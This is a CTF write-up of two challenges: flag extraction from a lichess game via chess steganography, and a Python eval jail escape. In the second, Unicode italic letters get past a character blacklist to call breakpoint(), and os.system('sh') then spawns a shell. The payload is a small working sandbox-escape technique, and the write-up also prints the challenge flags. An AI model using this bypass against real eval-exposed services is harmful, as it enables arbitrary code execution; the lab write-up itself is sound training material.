Miscellaneous

Name	Solves
Stego Gambit 🥉	29
Baby Pyjail 🥈	16

Stego Gambit

Description

Author: b4r

Kemarin malam aku sama bapak-bapak ronda main catur sekalian nunggu sahur, liat deh, gimana gg ga?

Initial Analysis

We are given a link (https://lichess.org/zI2kj3wX) to a chess game in lichess.com:

There is no obvious signs of flag. So i searched in google about chess steganography. And found this website.

Chess Steganographyincoherency.co.uk

From the description of the website:

This is a tool to encode/decode data in chess games. It first encodes the input data as a bignum, and then encodes the bignum in the move choices in the chess game.

Solve

We first need to dump the chess moves, we can use lichess API here:

We can just curl:

┌─[mirai@parrot]─[~]
└──╼ $curl https://lichess.org/game/export/zI2kj3wX
[Event "Import"]
[Site "https://lichess.org/zI2kj3wX"]
[Date "2025.03.03"]
[White "?"]
[Black "?"]
[Result "1-0"]
[GameId "zI2kj3wX"]
[UTCDate "2025.03.03"]
[UTCTime "15:27:29"]
[WhiteElo "?"]
[BlackElo "?"]
[Variant "Standard"]
[TimeControl "-"]
[ECO "A00"]
[Opening "Clemenz Opening"]
[Termination "Unknown"]

1. h3 { [%eval -0.03] } 1... c5 { [%eval 0.07] } 2. a3 { [%eval -0.26] } 2... a6 { [%eval -0.01] } 3. g3 { [%eval -0.23] } 3... h5 { [%eval 0.29] } 4. f4 { [%eval -0.44] } 4... Qc7 { [%eval -0.02] } 5. e4 { [%eval -0.48] } 5... b5 { [%eval 0.1] } 6. f5 { [%eval -2.77] } 6... d5 { [%eval -1.96] } 7. Bg2 { [%eval -2.07] } 7... dxe4 { [%eval -1.75] } 8. Bf1 { [%eval -6.1] } 8... Kd7 { [%eval -1.64] } 9. g4 { [%eval -5.68] } 9... h4 { [%eval -0.05] } 10. Bc4 { [%eval -5.03] } 10... Bb7 { [%eval -2.55] } 11. b4 { [%eval -5.27] } 11... Ra7 { [%eval -2.08] } 12. Bxf7 { [%eval -1.79] } 12... e6 { [%eval -0.26] } 13. Bg6 { [%eval -4.4] } 13... Qc6 { [%eval -0.43] } 14. Bh7 { [%eval -4.57] } 14... Kc8 { [%eval -3.22] } 15. c3 { [%eval -5.85] } 15... Qc7 { [%eval -4.46] } 16. Qc2 { [%eval -6.39] } 16... Ra8 { [%eval -3.84] } 17. Qa2 { [%eval -6.59] } 17... Nf6 { [%eval -5.18] } 18. Qb2 { [%eval -6.78] } 18... g6 { [%eval -4.67] } 19. d3 { [%eval -6.23] } 19... Ne8 { [%eval -3.34] } 20. Kd1 { [%eval -6.0] } 20... e5 { [%eval -2.92] } 21. Bg5 { [%eval -5.73] } 21... a5 { [%eval -2.41] } 22. Be3 { [%eval -5.35] } 22... Qb6 { [%eval -1.71] } 23. Nd2 { [%eval -4.08] } 23... gxf5 { [%eval 2.06] } 24. Qb1 { [%eval -5.28] } 1-0

We can then copy this Chess Notation to the Chess Steganography website. And we can get the flag!

Flag: RAMADAN{d3w4_k1p45_04109132}

Baby Pyjail

Description

Author: daffainfo

baby pyjail

Connect: nc playground.tcp1p.team 8011

Initial Analysis

We are given a single source code:

inp = input("Input pls")

if any(c in inp for c in "abcdefghijklmnopqrstuvwxyz0123456789_\"'."):
    print("Invalid input!")
else:
    print(eval(inp))

There's a vulnerability where our input is being eval''ed but our input is restricted to not contain these character:

abcdefghijklmnopqrstuvwxyz0123456789_\'.

Solve

One way to solve this pyjail is to use cursive text. Then we use the payload breakpoint() . When we invoke breakpoint, it will pop a Pdb (Python debugger). From there we can execute arbitrary command. I use below payload to get shell.

𝓫𝓻𝓮𝓪𝓴𝓹𝓸𝓲𝓷𝓽()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')

Flag: RAMADAN{well_ada_banyak_cara_buat_ngesolve_ni_soal}